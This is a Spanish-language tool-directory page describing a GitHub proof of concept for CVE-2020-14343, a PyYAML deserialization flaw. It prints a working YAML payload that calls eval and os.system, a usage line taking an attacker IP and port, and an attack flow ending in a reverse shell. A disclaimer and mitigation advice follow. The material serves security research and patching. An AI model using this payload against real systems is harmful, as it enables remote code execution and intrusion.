Directorio de Herramientas
Categorías
CVE-2020-14343-PyYAML — Payload de CVE-2020-14343 | Kitploit
Herramientas / GitHub / kairo-one / cve-2020-14343-pyyaml
kairo-one/cve-2020-14343-pyyaml CVE-2020-14343-PyYAML Payload de CVE-2020-14343
2 hace 9 mesesDescubre las herramientas más usadas por nuestra comunidad.
Últimos 7 Días Últimos 30 Días
CVE-2020-14343 POC de vulnerabilidad de deserialización de PyYAML
Resumen de la vulnerabilidad
ID de CVE CVE-2020-14343 Componente afectado PyYAML < 5.4 Tipo de vulnerabilidad Ejecución remota de código por deserialización (RCE) Nivel de riesgo Alto
Principio de la vulnerabilidad Cuando PyYAML utiliza yaml.load() para analizar datos no confiables, no restringe las etiquetas YAML peligrosas (como !!python/object). Un atacante puede construir contenido YAML malicioso para ejecutar código arbitrario de Python.
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
Uso python poc.py <目标URL> <攻击者IP> <监听端口>
python poc.py http://vulnerable-site.com 192.168.1.100 4444
Flujo del ataque
El script inicia un listener TCP en el equipo local.
Sube un archivo YAML malicioso al endpoint /upload del objetivo.
Activa el endpoint /login para cargar y analizar el YAML.
El servidor objetivo ejecuta el payload y devuelve una shell inversa al atacante.
Instalación de dependencias
Descargo de responsabilidad ⚠️ ¡Esta herramienta es exclusivamente para investigación de seguridad y pruebas autorizadas!
No la utilice con fines ilegales.
Asegúrese de haber obtenido la autorización del sistema objetivo antes de usarla.
El autor no se hace responsable de ningún uso indebido.
Recomendaciones de mitigación
Use yaml.safe_load() en lugar de yaml.load().
Actualice PyYAML a la versión 5.4 o superior.
Valide estrictamente la entrada del usuario.
Enlaces de referencia